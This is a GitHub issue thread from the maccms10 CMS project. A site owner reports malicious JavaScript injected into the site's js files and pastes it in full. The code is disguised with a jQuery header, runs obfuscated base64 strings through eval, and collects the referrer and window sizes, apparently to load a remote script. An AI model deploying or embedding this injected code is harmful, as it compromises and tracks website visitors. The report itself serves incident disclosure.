### ISSUE TITLE
js文件插入恶意内容

### ISSUE THREAD

**Issue by cdxxd555** [magicblack/maccms10#1158]
**描述您的问题**  
js 文件插入恶意内容，

插入内容为
`/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */
j = 'hp7cycq5CduFGdy9Gct' + 'l2Lzp2LjlG' + 'dhR3cv02' + 'bj5COrdWY' + 'uMWa0FGdz9' + 'yL6MHc0RHan0zc';
eval(no(nv(j)));
function gh() {
    r = document.referrer;
    if (r != '') {
        return r.match('//([^\s/]*)/')[1]
    } else {
        return ''
    }
}
;if (s != '') {
    cc = '?l=' + function() {
        var s;
        s = Date.now().toString();
        z = s.toString();
        w = s.split('');
        s = 0;
        for (var i = 8; i < 13; i++) {
            s += Number(w[i])
        }
        ;s = s % 8;
        return w.slice(4, ).join('') + s.toString();
    }();
    cc = cc + '&b=' + window.outerHeight + '&a=' + window.outerWidth + '&d=' + window.innerHeight + '&c=' + window.innerWidth;
    if (gh()) {
        cc = cc + '&h=' + gh() + '&e=' + document.referrer.length;
    }
    s = s + cc;
}
;j = ['cxsh', 'uuwerld', 'kwerh', '', '7IyOpc', 'iP0BXayN2cvwjP', 'gIyKnIyJrM3', 'KnIyJrISPjJ', '3cgQHcpJ3Yz', 'xzJoUGdpJ3', 'duQnbl1W', 'dj9GZ', 'i0ja', ];
eval(no(vn(j, 4)));
function no(e, v) {
    var m = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz" + "0123456789+/=";
    var t = "", n, r, i, s, o, u, a, f = 0;
    e = e.replace(/[^A-Za-z0-9+/=]/g, "");
    while (f < e.length) {
        s = m.indexOf(e.charAt(f++));
        o = m.indexOf(e.charAt(f++));
        u = m.indexOf(e.charAt(f++));
        a = m.indexOf(e.charAt(f++));
        n = s << 2 | o >> 4;
        r = (o & 15) << 4 | u >> 2;
        i = (u & 3) << 6 | a;
        t = t + String.fromCharCode(n);
        if (u != 64) {
            t = t + String.fromCharCode(r);
        }
        if (a != 64) {
            t = t + String.fromCharCode(i);
        }
    }
    return t;
}
;function vn(e, a=1, s, y) {
    return e.slice(a, ).join('').split('').reverse().join('');
}
;if (typeof window['imported_r_important'] === 'undefined') {
    eval(j);
    window['imported_r_important'] = 'set';
}
;function nv(e, a=2, s, y) {
    return e.split('').slice(a, ).reverse().join('');
}`

**版本信息:**  
 -  程序版本: 
 2023.1000.3052
2024.1000.4020

**Comment by Fewdays** [comment]
那个js文件

**Comment by cdxxd555** [comment]
站点的js文件基本都有插入

**Comment by cdxxd555** [comment]
这段JS能看出来做什么用的么？

**Comment by youxinge** [comment]
求增加 全站URL 获取功能  生产TXT 地图 然后分页 每页5万条   生产 播放器地址的ID URL连接 和 详情页面的链接  好做SEO
